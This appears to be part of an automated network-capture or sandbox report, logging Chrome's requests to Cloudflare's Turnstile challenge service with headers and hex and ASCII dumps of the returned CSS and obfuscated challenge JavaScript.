                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            142192.168.2.1749954104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb89d1f3defa1&lang=auto HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:56 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 114487
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8a17b944267-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 75
                                                                                                                                                                                                                                            Data Ascii: a%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_failure":"Error","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired","tu
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 2c 66 56 2c 67 37 2c 67 64 2c 67 65 2c 67 66 2c 67 70 2c 67 41 2c 67 45 2c 65 5a 2c 66 30 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 32 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 37 37 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 39 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 33 37 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 37 38 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 35 31 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 30 36 29 29 2f 37 2b 2d 70 61 72 73 65 49
                                                                                                                                                                                                                                            Data Ascii: ,fV,g7,gd,ge,gf,gp,gA,gE,eZ,f0){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1392))/1+parseInt(gI(577))/2*(-parseInt(gI(1189))/3)+-parseInt(gI(1237))/4*(-parseInt(gI(1178))/5)+-parseInt(gI(1051))/6+-parseInt(gI(1706))/7+-parseI
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 44 62 48 6a 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 48 59 61 74 78 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 5e 47 7d 2c 27 4c 54 6f 47 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 53 74 67 5a 74 27 3a 68 50 28 38 32 36 29 2c 27 75 6b 4a 73 78 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 55 50 6e 6b 59 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 59 4a 67 44 46 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 68 3d
                                                                                                                                                                                                                                            Data Ascii: nction(G,H){return G<H},'DbHjK':function(G,H){return H===G},'HYatx':function(G,H){return H^G},'LToGt':function(G,H){return G(H)},'StgZt':hP(826),'ukJsx':function(G,H,I){return G(H,I)},'UPnkY':function(G,H){return G+H},'YJgDF':function(G,H){return G+H}},h=
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 68 55 28 31 31 36 30 29 5d 28 37 36 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 38 33 29 2b 32 35 36 2c 32 35 35 29 2c 31 31 38 29 5d 2c 55 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 49 3d 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 58 3d 59 28 5a 2c 61 30 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 65 6c 73 65 7b 66 6f 72 28 47 5b 68 55 28 33 38 34 29 5d 28 29 2c 49 3d 30 3b 6f 5b 68 55 28 31 34 32 36 29 5d 28 49 2c 47 5b 68 55 28 31 33 34 36 29 5d 29 3b 6f 5b 68 55 28 33 31 35 29 5d 28 47 5b 49 5d 2c 47 5b 49 2b 31 5d 29 3f 47 5b 68 55 28 31 37 32 31 29 5d 28 49 2b 31 2c 31 29 3a 49 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29
                                                                                                                                                                                                                                            Data Ascii: hU(1160)](76,this.g)][0]++),83)+256,255),118)],U++);continue;case'5':I='';continue;case'6':X=Y(Z,a0);continue}break}}else{for(G[hU(384)](),I=0;o[hU(1426)](I,G[hU(1346)]);o[hU(315)](G[I],G[I+1])?G[hU(1721)](I+1,1):I+=1);return G}}(x),B='nAsAaAb'.split('A')
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 29 29 72 65 74 75 72 6e 20 69 5b 68 57 28 39 34 31 29 5d 28 27 6f 2e 27 2c 6e 29 3b 65 6c 73 65 7b 66 6f 72 28 73 3d 5b 5d 3b 69 5b 68 57 28 36 36 31 29 5d 28 6e 75 6c 6c 2c 69 29 3b 73 3d 73 5b 68 57 28 34 37 33 29 5d 28 6a 5b 68 57 28 38 37 31 29 5d 28 6b 29 29 2c 6e 3d 6d 5b 68 57 28 31 36 37 35 29 5d 28 6e 29 29 3b 72 65 74 75 72 6e 20 73 7d 7d 29 7d 2c 66 7a 3d 66 75 6e 63 74 69 6f 6e 28 68 58 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 68 58 3d 67 4a 2c 64 3d 7b 27 68 46 43 44 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 45 47 59 75 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 61 47 50 48 4b 27 3a 68 58 28 33 34 34 29 2c 27 4d 62 6e 55 63 27 3a 66
                                                                                                                                                                                                                                            Data Ascii: ))return i[hW(941)]('o.',n);else{for(s=[];i[hW(661)](null,i);s=s[hW(473)](j[hW(871)](k)),n=m[hW(1675)](n));return s}})},fz=function(hX,d,e,f,g){return hX=gJ,d={'hFCDN':function(h,i){return h===i},'EGYuN':function(h,i){return h+i},'aGPHK':hX(344),'MbnUc':f
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 69 30 29 7b 72 65 74 75 72 6e 20 69 30 3d 68 5a 2c 69 5b 69 30 28 35 32 38 29 5d 28 69 5b 69 30 28 31 36 31 38 29 5d 2c 69 30 28 39 35 33 29 29 3f 69 5b 69 30 28 31 32 33 35 29 5d 5b 69 30 28 31 30 38 31 29 5d 28 6a 29 3a 64 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 31 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 69 31 3d 68 58 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 69 31 28 31 33 34 36 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b
                                                                                                                                                                                                                                            Data Ascii: ':f.g(h,6,function(j,i0){return i0=hZ,i[i0(528)](i[i0(1618)],i0(953))?i[i0(1235)][i0(1081)](j):d})},'g':function(i,j,o,i1,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O){if(i1=hX,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[i1(1346)];J+=1)if(K=i[
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 72 28 73 3d 30 3b 64 5b 69 31 28 38 38 30 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 31 28 36 38 36 29 5d 28 64 5b 69 31 28 31 37 32 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 69 31 28 39 36 32 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 69 31 28 31 35 35 36 29 5d 28 48 2c 31 29 7c 64 5b 69 31 28 31 34 31 36 29 5d 28 4f 2c 31 29 2c 49 3d 3d 64 5b 69 31 28 31 34 32 37 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 31 28 36 38 36 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 69 31 28 36 36 35 29 5d 28 64 5b 69 31 28 31 32 36 39 29 5d
                                                                                                                                                                                                                                            Data Ascii: r(s=0;d[i1(880)](s,F);H<<=1,j-1==I?(I=0,G[i1(686)](d[i1(1727)](o,H)),H=0):I++,s++);for(O=C[i1(962)](0),s=0;8>s;H=d[i1(1556)](H,1)|d[i1(1416)](O,1),I==d[i1(1427)](j,1)?(I=0,G[i1(686)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=d[i1(665)](d[i1(1269)]
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 34 28 31 30 32 31 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 34 28 38 37 39 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 34 28 38 31 38 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 69 34 28 38 38 30 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 69 34 28 36 38 36 29 5d 28 4d 29 3b 3b 29 69 66 28 64 5b 69 34 28 37 32 35 29
                                                                                                                                                                                                                                            Data Ascii: (H=j,G=o(I++)),J|=d[i4(1021)](0<L?1:0,F),F<<=1);M=e(J);break;case 1:for(J=0,K=Math[i4(879)](2,16),F=1;K!=F;L=H&G,H>>=1,H==0&&(H=j,G=d[i4(818)](o,I++)),J|=(d[i4(880)](0,L)?1:0)*F,F<<=1);M=e(J);break;case 2:return''}for(E=s[3]=M,D[i4(686)](M);;)if(d[i4(725)
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 69 36 29 7b 69 36 3d 69 35 2c 65 4d 5b 65 5b 69 36 28 31 35 33 33 29 5d 5d 26 26 28 65 4d 5b 69 36 28 31 32 34 38 29 5d 5b 69 36 28 35 35 31 29 5d 28 29 2c 65 4d 5b 69 36 28 31 32 34 38 29 5d 5b 69 36 28 31 32 38 35 29 5d 28 29 2c 65 4d 5b 69 36 28 31 36 33 31 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 69 36 28 31 35 33 33 29 5d 5d 5b 69 36 28 31 32 35 34 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 36 28 38 38 38 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 36 28 34 31 32 29 5d 5b 69 36 28 35 39 38 29 5d 2c 27 65 76 65 6e 74 27 3a 69 36 28 38 34 34 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 69 36 28 34 31 32 29 5d 5b 69 36 28 38 33 34 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 69 36 28 34 31 32 29 5d 5b 69 36 28 36 32
                                                                                                                                                                                                                                            Data Ascii: nction(i6){i6=i5,eM[e[i6(1533)]]&&(eM[i6(1248)][i6(551)](),eM[i6(1248)][i6(1285)](),eM[i6(1631)]=!![],eM[e[i6(1533)]][i6(1254)]({'source':i6(888),'widgetId':eM[i6(412)][i6(598)],'event':i6(844),'cfChlOut':eM[i6(412)][i6(834)],'cfChlOutS':eM[i6(412)][i6(62


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            143192.168.2.1749955104.18.95.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb89d1f3defa1&lang=auto HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:56 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 126780
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8a6e93542ca-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:56 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
